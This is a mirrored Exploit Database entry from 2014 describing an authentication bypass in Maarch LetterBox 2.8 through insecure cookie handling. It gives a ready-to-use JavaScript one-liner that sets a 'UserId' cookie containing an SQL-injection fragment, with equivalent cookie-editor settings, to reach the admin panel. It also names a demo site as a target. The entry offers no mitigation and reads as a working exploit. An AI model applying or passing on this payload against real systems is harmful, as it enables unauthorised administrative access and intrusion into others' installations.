Maarch LetterBox 2.8 – (Authentication Bypass) Insecure Cookies

• Exploit Database
• 15 阅读

• 作者： ZoRLu Bugrahan
  日期： 2014-11-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35271/

• # Title: Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
  # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
  # Home : http://milw00rm.com / its online
  # Date : 17.11.2014
  # Demo		 : http://www.era.sn/courrier
  # Download 	 : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
  # Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
  
  you first go here:
  
  http://www.target.com/path/index.php?page=welcome.php
  
  you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
  
  exploit:
  
  javascript:document.cookie = "UserId=[username] ' or '; path=/";
  
  or you edit your cookie's with "Cookies Manager"
  
  name = maarch
  contents = UserId=username ' or '
  host = your target
  path = /script_path/
  
  and dont change other options its keep default.